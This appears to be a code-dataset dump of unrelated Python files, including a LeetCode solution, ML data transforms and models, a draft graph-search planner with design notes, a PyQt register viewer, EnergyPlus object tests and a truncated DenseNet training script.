id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
11555764
|
class Solution:
def findDiagonalOrder(self, matrix):
i, j, d, res, n, m = 0, 0, 1, [], len(matrix), len(matrix and matrix[0])
while i < n and j < m:
res.append(matrix[i][j])
if j + 1 < m and (i == 0 and d == 1) or (i == n - 1 and d == -1): j, d = j + 1, -d
elif i + 1 < n and (j == 0 and d == -1) or (j == m - 1 and d == 1): i, d = i + 1, -d
elif d == 1: i, j = i - 1, j + 1
else: i, j = i + 1, j - 1
return res
|
11555790
|
import glob
from utils import load_from_file
import numpy as np
import pandas as pd
fnames = glob.glob("/users/mscherbela/runs/jaxtest/conv/test9/*/results.bz2")
all_data = []
for f in fnames:
data = load_from_file(f)
d = data['config']
E_eval_mean = data['E_eval_mean']
d['Eval_mean_of_std'] = np.mean(data['E_eval_std'])
d['Eval_std_of_mean'] = np.mean(data['E_eval_mean'])
all_data.append(d)
df = pd.DataFrame(all_data)
|
11555816
|
from ir_axioms.model import base, context
# Re-export sub-modules.
Query = base.Query
Document = base.Document
TextDocument = base.TextDocument
RankedDocument = base.RankedDocument
RankedTextDocument = base.RankedTextDocument
JudgedRankedDocument = base.JudgedRankedDocument
JudgedRankedTextDocument = base.JudgedRankedTextDocument
IndexContext = context.IndexContext
|
11555818
|
from sqlalchemy.ext.mutable import MutableDict
from sqlalchemy_utils import UUIDType, JSONType
from depc.extensions import db
from depc.models import BaseModel
class Config(BaseModel):
__tablename__ = "configs"
__repr_fields__ = ("id", "team")
team_id = db.Column(
UUIDType(binary=False), db.ForeignKey("teams.id"), nullable=False
)
team = db.relationship("Team", back_populates="configs")
data = db.Column(MutableDict.as_mutable(JSONType), default={}, nullable=False)
|
11555845
|
import torch
from torchvision.transforms import autoaugment, transforms
from torchvision.transforms.functional import InterpolationMode
class ClassificationPresetTrain:
def __init__(self, crop_size, image_mean=(123.675, 116.28, 103.53), image_scale=(0.017125, 0.017507, 0.017429), hflip_prob=0.5,
auto_augment_policy=None, random_erase_prob=0.0):
# Note: input is divided by 255 before this mean/std is applied
# Note: can potentially use direct_float in ToTensor and then T.NormalizeMeanScale() to avoid division by 255
float_mean = [m/255.0 for m in image_mean]
float_std = [(1.0/s)/255.0 for s in image_scale]
trans = [transforms.RandomResizedCrop(crop_size)]
if hflip_prob > 0:
trans.append(transforms.RandomHorizontalFlip(hflip_prob))
if auto_augment_policy is not None:
if auto_augment_policy == "ra":
trans.append(autoaugment.RandAugment())
elif auto_augment_policy == "ta_wide":
trans.append(autoaugment.TrivialAugmentWide())
else:
aa_policy = autoaugment.AutoAugmentPolicy(auto_augment_policy)
trans.append(autoaugment.AutoAugment(policy=aa_policy))
trans.extend([
transforms.PILToTensor(),
transforms.ConvertImageDtype(torch.float),
transforms.Normalize(mean=float_mean, std=float_std),
])
if random_erase_prob > 0:
trans.append(transforms.RandomErasing(p=random_erase_prob))
self.transforms = transforms.Compose(trans)
def __call__(self, img):
return self.transforms(img)
class ClassificationPresetEval:
def __init__(self, crop_size, resize_size=256, image_mean=(123.675, 116.28, 103.53), image_scale=(0.017125, 0.017507, 0.017429),
interpolation=InterpolationMode.BILINEAR):
# Note: input is divided by 255 before this mean/std is applied
# Note: can potentially use direct_float in ToTensor and then T.NormalizeMeanScale() to avoid division by 255
float_mean = [m/255.0 for m in image_mean]
float_std = [(1.0/s)/255.0 for s in image_scale]
self.transforms = transforms.Compose([
transforms.Resize(resize_size, interpolation=interpolation),
transforms.CenterCrop(crop_size),
transforms.PILToTensor(),
transforms.ConvertImageDtype(torch.float),
transforms.Normalize(mean=float_mean, std=float_std),
])
def __call__(self, img):
return self.transforms(img)
|
11555899
|
import random
# Ok, I think what we have below is correct as pseudo-code.
# Next: test it with a simple environment and make it no-longer pseudo-code
# After that: make it into a persistent thing that I can make multiple calls to.
'''
A snag:
I need some way of figuring out whether a node has already been explored. Currently these nodes can be anything. Ideally they would be something hashable so I can put them in a set or a dictionary, or even just use them as edge coordinates without using the more cumbersome integer ids to stand in for them in the set of edges.
Options:
1. Follow through: make the nodes be hashable and just do this.
2. Make an additional function (which must be passed in) that returns a unique id that can be used... but this is basically just the hash function.
What I'm going to do for now:
Follow through, make everything be hashable (can go in a set, etc.) then revise if that becomes unfeasible later.
'''
'''
A few thoughts:
There are two components here:
One thing that grows this graph and another thing that tries to find a path through that graph from start to goal. Both need similar, but slightly different structures. The graph can be shared for all time (i.e. by multiple calls to plan for the same target configuration). The path finder is specific to the start and goal.
The basic idea is to grow the graph until you can find a path through it from the start to the goal that is "good enough." How do you know when to check if you have a path from start to goal? At the moment, it seems like you can do this every time you make a connection back to the graph. But there's a better thing here I think. If you keep track of what nodes are reachable from the current start, then you can only check once you hit a previously unreachable node. That's not bad.
'''
'''
Another issue (perhaps for later):
Also, how do I do the backward search that lets me avoid camera motion? Right now this is all forward.
'''
'''
Tangles:
What is the interface that I want to provide to the gentle user of this function for any reasonable version of this?
So first off, we need an env.
My idea from earlier this morning is that each component should provide get_state and set_state (which should return an observation) methods that allow us to jump around to different states and do backtracking, etc. The combined state is then a good thing to use as a node indentifier.
My idea from later this evening was to impose some kind of structure on this whole thing and use the fact that we are always adding or removing bricks that correspond to some target. In that way, each state would bastically be a bit-vector for whether or not a certain target node has a corresponding node in the scene, and then another bit vector if we want to allow non-target nodes to show up when an agent makes mistakes. This is nice because we have a nice distance metric to use here when planning (hamming distance).
The problem with the first thing is that it makes it hard to use certain nice heuristics, like assembly via disassembly.
The problem with the second thing is it's more limited and doesn't have variables for things like camera motion. So out the window it goes maybe?
The problem with throwing it out is that this assembly via disassembly is probably pretty powerful, and without it, it will take a lot more work to make sure we don't move the camera too much.
The second problem with it though is that we now have to figure out a way to translate whatever our different state space is to this bit vector, which becomes something we either have to make as some super-generic component of the env (which doesn't really make sense, because the env can cover spaces that don't have a specific target) or make that conversion another thing the user has to specify. What are we to do?
So conceptually, it would be really nice to be able to use whatever configuration space we want, but doing so gets rid of some powerful heuristics.
So what else must the user provide? Honestly, it would be nice if the answer was "a start, a goal and not much else." But then I realize that I have these functions that I've been treating as arguments: neighbor_fn and check_edge_fn. These are two new things that must be supplied by the gentle user, and they are not trivial at all. In the case of the reassembly planner, the neighbor_fn is:
def neighbor_fn(env, state, target):
obs = env.set_state(state)
current_instances = get_instances_from_obs()
match(current_instances, target)
if misplaced_current_instances:
return remove_ops_for_misplaced_current_instances
elif unplaced_target_instances:
return add_ops_for_target_graph_neighbors
else:
return []
But here we find another tangle: if our state space is this convoluted thing we get directly from the environment, how do we know what the neighbors will be or what high level actions we can reason about? I mean, yeah I guess we can just hard-code it, and make our gentle user specify it in whatever implments remove_ops_for_misplaced_current_instances. This gets back to the fact that somebody real, either us or gentle user is going to need to do some transating from goofy complicated state space output by the environment to clean precise hashable node that can be added to a python set or dictionary and tested for equality with other nodes.
What to do what to do?
Is there a different route to take? Lookng further afield, we could go to the bit-vector approach, and make everything else (cameras) part of the transition space between nodes. The problem with this is that we'd then have to track this as we trace a path through high-level nodes.
What if we just tried to plan directly in the super-crazy-pants space? Skip the high-level/low-level thing and just do all planning in the low-level space. This seems pretty hard though. Maybe possible with crazy heuristics? I mean that's kind of what my last attempt was/is right? And that has been kind of a disaster. Why? There's still some business to clear up there about viewpoints and other things. What a mess.
Ok, so how can we make the high-level/low-level search work? And make it general enough to use for multiple action spaces? This thing really is about adding and removing nodes, so maybe we do the bit-vector thing with a... no no no. We need the camera in there too. So the neighbor function is going to return camera motions as well? Yikes. Is this where some heuristic comes in to compensate for the blow-up in graph degree? Guess so.
We're also going to need something that can get us from point a to point b using low-level actions. I guess we know how to do this, the last few attempts at this all do something similar, but the last few attempts have also been all this crazy specific mess. I guess this is kind of fine if it gets me there, BUT I thought cleaning up that mess was part of what this attempt was all about, and it's kind of disappointing to throw away generality again (or require the gentle user to implement so so much).
As a thought exercise, let's pull this together from the bottom up. At the lowest level, our action space is all the pixels in the screen plus a dozen or so extra levers.
From here we can consolidate all the pixels into a varying number of discrete regions that all do the same thing. This takes us from ~256x256 to probably a few hundred discrete snap points. A few hundred is still really big. We could reduce this still if we group those few hundred into a slightly smaller functionally equivalent class, where all the snaps that result in the same next pose get grouped together. This may help a little bit, but not as much as we need. Is this getting us anywhere?
One thought: we can make the low-level planner be another instantiation of the high-level planner. Fancy fancy. In this case, the check_edge function would do nothing because all the edges are already correctly connected to each other. Would be kinda cool if it worked.
Ok no more tangles.
'''
'''
High Level:
env: gym environment
nodes: states
edges: lazily evaluated low-level state-action-state paths
neighbor_fn: [manually specified] add-remove bricks plus camera actions
check_edge_fn: low-level planner
Low Level:
env: gym environment (shared with high-level)
nodes: states
edges: actions
neighbor_fn:
Yo wait wait wait... what if we added a new action space that us find high-level neighbors automatically based on the target. Yeah I like that a lot. This is only in the training environment, so the agent can't actually use it, but it can be used for supervision. We could even do this for the low-level environment too. The purpose of it is just to specify the structure of the graph for planning at that particular level. We could even make this some levels deeper by making the low-level planner operate in symbolic snap space and defer that plan to a low-low-level (basement-level) planner that picks out pixel coordinates and shit. Eew man, that's nasty. Maybe good nasty. Maybe bad nasty. Won't know until the morning.
How does all this make the planning more general and easy to use?
Oh one more thing, if we do the center-viewport-to-snap thing I've been mulling over in my head, then the number of camera actions are really big yo. This is kind of similar to the issues I'm having with everything else though. It seems like I need a special heuristic kind of thing to tell me which ones of these to consider.
'''
'''
There is another argument to make here: just forget all this fancy general nonsense and make one thing that works for reassembly. Oof. Just fuggin do it, you know? Is this the right thing? Don't mull it over. Lay it out. Let's start laying this out, enough meandering.
'''
class GraphSearch:
def __init__(self, road_map):
self.road_map = road_map
class RoadMap:
def __init__(
self,
env,
neighbor_fn,
check_edge_fn,
):
self.env = env
self.nodes = set()
self.edges = {}
# TODO: make these members, and make the user subclass RoadMap?
self.neighbor_fn = neighbor_fn
self.check_edge_fn = check_edge_fn
def plan(self, start, goal, max_cost=float('inf')):
while True:
path, cost = self.graph_search(start, goal, max_cost=max_cost)
if path is not None:
return path, cost
new_nodes = self.expand_graph()
if not new_nodes:
raise Exception
def graph_search(self, start, goal, max_cost=max_cost):
precursors = {}
frontier = [(0,start)]
def plan(
env,
start,
goal,
neighbor_fn,
check_edge_fn,
max_cost=float('inf'),
):
nodes = {goal}
edges = {}
# initialize the frontier
frontier = [(None, start)]
reachable_nodes = {start}
def pick_from_frontier():
connected_edges = [
(a,b) for (a,b) in frontier if b in nodes]
if connected_edges:
return random.choice(connected_eges)
else:
return random.choice(frontier)
while frontier:
source, destination = pick_from_frontier()
nodes.add(destination)
if source is not None:
edges[source, destination] = float('inf'), None
if destination not in reachable_nodes:
path_steps = []
path_cost = 0.
# this should be an in-place A* update or something
path = graph_search(start, goal, nodes, edges)
for s, d in path:
edge_cost, edge_steps = edges[s,d]
if edge_steps is None:
cost, steps = check_edge_fn(env, s, d)
edge[s, d] = cost, steps
path_steps.extend(steps)
path_cost += cost
if path_cost >= max_cost:
break
reachable_nodes.add(d)
else:
return path_steps, path_cost
neighbors = neighbor_fn(env, dest)
for neighbor in neighbors:
frontier.append((dest, neighbor))
# if we can't find anything, return an empty sequence with infinite cost
return [], float('inf')
def test_plan():
'''
d
x \
b---c
\ x
a
'''
nodes = set('abcd')
start = 'a'
goal = 'b'
def neighbor_fn(env, node):
if node == 'a':
return 'b', 'c'
elif node == 'b':
return 'c', 'd'
elif node == 'c':
return 'b', 'd'
elif node == 'd':
return ()
def check_fn(env, s, d):
if s == 'a' and d == 'b':
return 0., ['ab.1', 'ab.2']
elif s == 'a' and d == 'c':
return float('inf'), []
elif s == 'b' and d == 'd':
return float('inf'), []
elif s == 'b' and d == 'c':
return 0., ['bc.1', 'bc.2']
elif s == 'c' and d == 'b':
return 0., ['cb.1', 'cb.2']
elif s == 'c' and d == 'd':
return 0., ['cd.1', 'cd.2']
plan(None, 'a', 'b', neighbor_fn, check_fn)
if __name__ == '__main__':
test_plan()
|
11555907
|
import torch
from torch import nn
from transformers import AlbertModel
class MME2E_T(nn.Module):
def __init__(self, feature_dim, num_classes=4, size='base'):
super(MME2E_T, self).__init__()
self.albert = AlbertModel.from_pretrained(f'albert-{size}-v2')
# self.text_feature_affine = nn.Sequential(
# nn.Linear(768, 512),
# nn.ReLU(),
# nn.Linear(512, feature_dim)
# )
def forward(self, text, get_cls=False):
# logits, hidden_states = self.albert(**text, output_hidden_states=True)
last_hidden_state, _ = self.albert(**text)
if get_cls:
cls_feature = last_hidden_state[:, 0]
# cls_feature = self.text_feature_affine(cls_feature)
return cls_feature
text_features = self.text_feature_affine(last_hidden_state).sum(1)
return text_features
|
11555928
|
import FWCore.ParameterSet.Config as cms
from IOMC.EventVertexGenerators.VtxSmearedParameters_cfi import *
matchVtx = cms.EDProducer("MixEvtVtxGenerator",
signalLabel = cms.InputTag("hiSignal"),
heavyIonLabel = cms.InputTag("generator","unsmeared")
)
|
11555961
|
import threading, unittest
from bibliopixel.util.threads import compose_events
class ComposeEventTest(unittest.TestCase):
def test_compose_events(self):
a, b = threading.Event(), threading.Event()
master = compose_events.compose_events([a, b])
self.assertFalse(master.is_set())
a.set()
self.assertFalse(master.is_set())
b.set()
self.assertTrue(master.is_set())
a.clear()
self.assertFalse(master.is_set())
b.clear()
self.assertFalse(master.is_set())
b.set()
self.assertFalse(master.is_set())
a.set()
self.assertTrue(master.is_set())
|
11556030
|
import pickle
import shutil
import unittest
import platform
import subprocess
from pathlib import Path
from autodrome.simulator import Simulator, ETS2, ATS
from .map import Map
from .definition import Definition
class Policeman:
ExtractorExecutable = Path(__file__).parent / 'bin/scs_extractor.exe'
def __init__(self, simulator: Simulator):
self.simulator = simulator
self.world = self.setup_world(overwrite=False)
self.map = self.setup_map()
self.plot = None
def setup_world(self, overwrite: bool=False) -> Definition:
""" Extract ETS2/ATS archives to an intermediate cache for parsing """
extractor = self.simulator.RootGameFolder / 'scs_extractor.exe'
shutil.copy(self.ExtractorExecutable, extractor)
cache_dir = self.simulator.mod_dir / 'cache'
cache_dir.mkdir(parents=True, exist_ok=True)
print(f"Setting up extracted game archives cache in '{cache_dir}'...")
for archive in ['def']: # It looks like base.scs and others are not needed
if (cache_dir / archive).exists() and not overwrite:
print(f"Skipping '{self.simulator.RootGameFolder / archive}.scs' ...")
continue
print(f"Extracting '{self.simulator.RootGameFolder / archive}.scs' (This takes a few minutes)...")
if platform.system() == 'Windows':
extract_command = [str(extractor), archive + '.scs', str(cache_dir)]
else:
extract_command = ['wineconsole', str(extractor), archive + '.scs', str(cache_dir)]
subprocess.check_call(extract_command, cwd=self.simulator.RootGameFolder)
extractor.unlink()
if (cache_dir / 'world.pkl').exists():
with open(cache_dir / 'world.pkl', 'rb') as world_pkl:
world = pickle.load(world_pkl)
else:
world = Definition(cache_dir / 'def/world', recursive=True)
with open(cache_dir / 'world.pkl', 'wb') as world_pkl:
pickle.dump(world, world_pkl)
return world
def setup_map(self) -> Map:
""" Open and parse ETS2/ATS text map file """
map = Map(self.simulator.mod_dir / 'map/indy500.txt')
return map
# region Unit Tests
class TestPoliceman(unittest.TestCase):
@unittest.skipUnless(ETS2.RootGameFolder.exists(), "ETS2 not installed")
def test_ets2(self):
with ETS2() as ets2:
policeman = Policeman(ets2)
@unittest.skipUnless(ATS.RootGameFolder.exists(), "ATS not installed")
def test_ats(self):
with ATS() as ats:
policeman = Policeman(ats)
# endregion
|
11556043
|
import sys
import unittest
from targetprologstandalone import entry_point
from StringIO import StringIO
class TestSpyrolog(unittest.TestCase):
def test_direct(self):
stdout_bak = sys.stdout
try:
result = StringIO()
sys.stdout = result
entry_point([
'',
'data/direct_facts.txt',
'data/direct_sims.txt',
#'s0(e0,e1).|s0(e2,e1).|s0(e3,e1).|s0(e4,e1).|s0(e5,e1).|s0(e6,e1).|s0(e1,e0).|s0(e1,e2).|s0(e1,e3).|s0(e1,e4).|s0(e1,e5).|s0(e1,e6).',
's0(e1,e3).',
'3',
'0',
'prod|prod',
'0'
])
result = result.getvalue().strip()
print "result", result
self.assertIn('0.5', result)
finally:
sys.stdout = stdout_bak
if __name__ == '__main__':
unittest.main()
|
11556095
|
import pytest
from mfsetup.mf5to6 import (
get_package_name,
get_variable_name,
get_variable_package_name,
)
@pytest.mark.parametrize('version_var_expected', [('mfnwt', 'k', 'hk'),
('mfnwt', 'k33', 'vka'),
('mfnwt', 'botm', 'botm'),
('mfnwt', 'idomain', 'ibound'),
('mf6', 'hk', 'k'),
('mf6', 'vka', 'k33'),
('mf6', 'ibound', 'idomain'),
('mf6', 'botm', 'botm'),
])
def test_get_variable_name(version_var_expected):
model_version, var, expected = version_var_expected
result = get_variable_name(var, model_version)
assert result == expected
@pytest.mark.parametrize('version_var_default_expected',
[('mfnwt', 'idomain', 'dis', 'bas6'),
('mfnwt', 'strt', 'ic', 'bas6'),
('mfnwt', 'botm', 'dis', 'dis'),
('mfnwt', 'sy', 'npf', 'upw'),
('mfnwt', 'ss', 'npf', 'upw'),
('mfnwt', 'k', 'npf', 'upw'),
('mfnwt', 'k33', 'npf', 'upw'),
('mf6', 'ibound', 'bas6', 'dis'),
('mf6', 'strt', 'bas6', 'ic'),
('mf6', 'sy', 'upw', 'sto'),
('mf6', 'ss', None, 'sto'),
('mf6', 'hk', 'upw', 'npf'),
('mf6', 'vka', None, 'npf'),
('mf2005', 'botm', 'dis', 'dis'),
('mf2005', 'sy', 'upw', 'lpf'),
('mf2005', 'ss', 'npf', 'lpf'),
('mf2005', 'k', None, 'lpf'),
('mf2005', 'k33', 'npf', 'lpf'),
])
def test_get_variable_package_name(version_var_default_expected):
model_version, var, default, expected = version_var_default_expected
result = get_variable_package_name(var, model_version, default)
assert result == expected
@pytest.mark.parametrize('version_package_expected',
[('mfnwt', 'npf', {'upw'}),
('mfnwt', 'sto', {'upw'}),
('mfnwt', 'ic', {'bas6'}),
('mfnwt', 'dis', {'dis', 'bas6'}),
('mfnwt', 'tdis', {'dis'}),
('mfnwt', 'oc', {'oc'}),
('mf6', 'dis', {'dis', 'tdis'}),
('mf6', 'upw', {'npf', 'sto'}),
('mf6', 'lpf', {'npf', 'sto'}),
('mf6', 'bas6', {'ic', 'dis'}),
('mf6', 'oc', {'oc'}),
('mf2005', 'npf', {'lpf'}),
('mf2005', 'sto', {'lpf'}),
('mf2005', 'ic', {'bas6'}),
('mf2005', 'dis', {'dis', 'bas6'}),
('mf2005', 'tdis', {'dis'}),
])
def test_get_package_name(version_package_expected):
model_version, package, expected = version_package_expected
result = get_package_name(package, model_version)
assert result == expected
|
11556120
|
import string
from PyQt5.QtWidgets import QTableWidget, QTableWidgetItem, QMenu, QAction
from PyQt5.QtCore import Qt, pyqtSignal
from PyQt5.QtGui import QColor, QCursor
from core import prefs
class RegTableWidget(QTableWidget):
regCheckBoxChanged = pyqtSignal(str, int)
def __init__(self, parent=None):
super(RegTableWidget, self).__init__(parent)
self.printer = print
self.regs = {}
self.modified_regs = []
self.modified_regs_ignore = ["eip", "rip"]
self.filtered_regs = []
self.checked_regs = {}
self.menu = None
if prefs.USE_DARK_THEME:
self.hl_color = QColor("darkRed")
else:
self.hl_color = QColor("#fcabab")
def create_context_menu(self):
"""Initializes context menu for mouse right click"""
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(self.on_custom_context_menu_requested)
self.menu = QMenu(self)
print_action = QAction("Print selected cells", self)
print_action.triggered.connect(self.print_selected_cells)
self.menu.addAction(print_action)
def onCellChanged(self, row, col):
if col > 0:
return
item = self.item(row, 0)
state = item.checkState()
state_bool = state == Qt.Checked
reg_name = item.text()
self.checked_regs[reg_name] = state
self.regCheckBoxChanged.emit(reg_name, state_bool)
def on_custom_context_menu_requested(self):
"""Context menu callback for mouse right click"""
if self.menu is not None:
self.menu.popup(QCursor.pos())
def set_data(self, regs, modified_regs):
"""Sets table data and populates the table"""
if self.filtered_regs:
temp_regs = {}
for reg, value in regs.items():
if reg in self.filtered_regs:
temp_regs[reg] = value
regs = temp_regs
self.regs = regs
self.modified_regs = modified_regs
self.populate()
def populate(self):
"""Populates the register table"""
try:
self.cellChanged.disconnect()
except Exception:
pass
if self.rowCount() != len(self.regs):
self.setRowCount(len(self.regs))
if not self.regs:
return
i = 0
for reg, value in self.regs.items():
if self.filtered_regs and reg not in self.filtered_regs:
continue
regname_item = QTableWidgetItem(reg)
regname_item.setFlags(
Qt.ItemIsUserCheckable | Qt.ItemIsEnabled | Qt.ItemIsSelectable
)
check_state = self.checked_regs.get(reg, Qt.Unchecked)
regname_item.setCheckState(check_state)
self.setItem(i, 0, regname_item)
if isinstance(value, int):
hex_str = hex(value)
if 0 < value < 255 and chr(value) in string.printable:
hex_str += f" '{chr(value)}'"
hex_item = QTableWidgetItem(hex_str)
hex_item.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
dec_item = QTableWidgetItem(str(value))
dec_item.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
self.setItem(i, 1, hex_item)
self.setItem(i, 2, dec_item)
else:
self.setItem(i, 1, QTableWidgetItem(value))
if reg in self.modified_regs and reg not in self.modified_regs_ignore:
self.item(i, 0).setBackground(self.hl_color)
self.item(i, 1).setBackground(self.hl_color)
self.item(i, 2).setBackground(self.hl_color)
i += 1
if "eflags" in self.regs:
eflags = self.regs["eflags"]
flags = {
"c": eflags & 1, # carry
"p": (eflags >> 2) & 1, # parity
# "a": (eflags >> 4) & 1, # aux_carry
"z": (eflags >> 6) & 1, # zero
"s": (eflags >> 7) & 1, # sign
# "d": (eflags >> 10) & 1, # direction
# "o": (eflags >> 11) & 1 # overflow
}
flags_text = f"C:{flags['c']} P:{flags['p']} Z:{flags['z']} S:{flags['s']}"
self.setRowCount(i + 1)
self.setItem(i, 0, QTableWidgetItem("flags"))
self.setItem(i, 1, QTableWidgetItem(flags_text))
self.cellChanged.connect(self.onCellChanged)
def print(self, msg: str):
if self.printer:
self.printer(msg)
else:
print(msg)
def print_selected_cells(self):
"""Prints selected cells"""
items = self.selectedItems()
if len(items) < 1:
return
rows = {}
for item in items:
row = item.row()
if row not in rows:
rows[row] = [item.text()]
else:
rows[row].append(item.text())
for row in rows.values():
self.print(" ".join(row))
|
11556170
|
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.electric_load_center import GeneratorFuelCellExhaustGasToWaterHeatExchanger
log = logging.getLogger(__name__)
class TestGeneratorFuelCellExhaustGasToWaterHeatExchanger(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_generatorfuelcellexhaustgastowaterheatexchanger(self):
pyidf.validation_level = ValidationLevel.error
obj = GeneratorFuelCellExhaustGasToWaterHeatExchanger()
# alpha
var_name = "Name"
obj.name = var_name
# node
var_heat_recovery_water_inlet_node_name = "node|Heat Recovery Water Inlet Node Name"
obj.heat_recovery_water_inlet_node_name = var_heat_recovery_water_inlet_node_name
# node
var_heat_recovery_water_outlet_node_name = "node|Heat Recovery Water Outlet Node Name"
obj.heat_recovery_water_outlet_node_name = var_heat_recovery_water_outlet_node_name
# real
var_heat_recovery_water_maximum_flow_rate = 4.4
obj.heat_recovery_water_maximum_flow_rate = var_heat_recovery_water_maximum_flow_rate
# node
var_exhaust_outlet_air_node_name = "node|Exhaust Outlet Air Node Name"
obj.exhaust_outlet_air_node_name = var_exhaust_outlet_air_node_name
# alpha
var_heat_exchanger_calculation_method = "FixedEffectiveness"
obj.heat_exchanger_calculation_method = var_heat_exchanger_calculation_method
# real
var_method_1_heat_exchanger_effectiveness = 7.7
obj.method_1_heat_exchanger_effectiveness = var_method_1_heat_exchanger_effectiveness
# real
var_method_2_parameter_hxs0 = 8.8
obj.method_2_parameter_hxs0 = var_method_2_parameter_hxs0
# real
var_method_2_parameter_hxs1 = 9.9
obj.method_2_parameter_hxs1 = var_method_2_parameter_hxs1
# real
var_method_2_parameter_hxs2 = 10.1
obj.method_2_parameter_hxs2 = var_method_2_parameter_hxs2
# real
var_method_2_parameter_hxs3 = 11.11
obj.method_2_parameter_hxs3 = var_method_2_parameter_hxs3
# real
var_method_2_parameter_hxs4 = 12.12
obj.method_2_parameter_hxs4 = var_method_2_parameter_hxs4
# real
var_method_3_h0gas_coefficient = 13.13
obj.method_3_h0gas_coefficient = var_method_3_h0gas_coefficient
# real
var_method_3_ndotgasref_coefficient = 14.14
obj.method_3_ndotgasref_coefficient = var_method_3_ndotgasref_coefficient
# real
var_method_3_n_coefficient = 15.15
obj.method_3_n_coefficient = var_method_3_n_coefficient
# real
var_method_3_gas_area = 16.16
obj.method_3_gas_area = var_method_3_gas_area
# real
var_method_3_h0_water_coefficient = 17.17
obj.method_3_h0_water_coefficient = var_method_3_h0_water_coefficient
# real
var_method_3_n_dot_water_ref_coefficient = 18.18
obj.method_3_n_dot_water_ref_coefficient = var_method_3_n_dot_water_ref_coefficient
# real
var_method_3_m_coefficient = 19.19
obj.method_3_m_coefficient = var_method_3_m_coefficient
# real
var_method_3_water_area = 20.2
obj.method_3_water_area = var_method_3_water_area
# real
var_method_3_f_adjustment_factor = 21.21
obj.method_3_f_adjustment_factor = var_method_3_f_adjustment_factor
# real
var_method_4_hxl1_coefficient = 22.22
obj.method_4_hxl1_coefficient = var_method_4_hxl1_coefficient
# real
var_method_4_hxl2_coefficient = 23.23
obj.method_4_hxl2_coefficient = var_method_4_hxl2_coefficient
# real
var_method_4_condensation_threshold = 24.24
obj.method_4_condensation_threshold = var_method_4_condensation_threshold
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].name, var_name)
self.assertEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].heat_recovery_water_inlet_node_name, var_heat_recovery_water_inlet_node_name)
self.assertEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].heat_recovery_water_outlet_node_name, var_heat_recovery_water_outlet_node_name)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].heat_recovery_water_maximum_flow_rate, var_heat_recovery_water_maximum_flow_rate)
self.assertEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].exhaust_outlet_air_node_name, var_exhaust_outlet_air_node_name)
self.assertEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].heat_exchanger_calculation_method, var_heat_exchanger_calculation_method)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_1_heat_exchanger_effectiveness, var_method_1_heat_exchanger_effectiveness)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_2_parameter_hxs0, var_method_2_parameter_hxs0)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_2_parameter_hxs1, var_method_2_parameter_hxs1)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_2_parameter_hxs2, var_method_2_parameter_hxs2)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_2_parameter_hxs3, var_method_2_parameter_hxs3)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_2_parameter_hxs4, var_method_2_parameter_hxs4)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_h0gas_coefficient, var_method_3_h0gas_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_ndotgasref_coefficient, var_method_3_ndotgasref_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_n_coefficient, var_method_3_n_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_gas_area, var_method_3_gas_area)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_h0_water_coefficient, var_method_3_h0_water_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_n_dot_water_ref_coefficient, var_method_3_n_dot_water_ref_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_m_coefficient, var_method_3_m_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_water_area, var_method_3_water_area)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_3_f_adjustment_factor, var_method_3_f_adjustment_factor)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_4_hxl1_coefficient, var_method_4_hxl1_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_4_hxl2_coefficient, var_method_4_hxl2_coefficient)
self.assertAlmostEqual(idf2.generatorfuelcellexhaustgastowaterheatexchangers[0].method_4_condensation_threshold, var_method_4_condensation_threshold)
|
11556177
|
from __future__ import print_function
import configargparse
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.backends.cudnn as cudnn
import torchnet as tnt
from torchnet.engine import Engine
from torchnet.logger import VisdomPlotLogger, VisdomLogger
from tqdm import tqdm
from models import DenseNet
from datasets import ImageNet, CIFAR10, CIFAR100
import os
import copy
import math
import random
import numpy as np
parser = configargparse.ArgParser(default_config_files=[])
parser.add('--config', required=True, is_config_file=True, help='config file path')
parser.add('--batch-size', type=int, default=256, metavar='N',
help='input batch size for training (default: 256)')
parser.add('--num-batch-splits', type=int, default=1, metavar='split',
help='split batch size for training (default: 1)')
parser.add('--dataset', type=str, required=True, metavar='dataset',
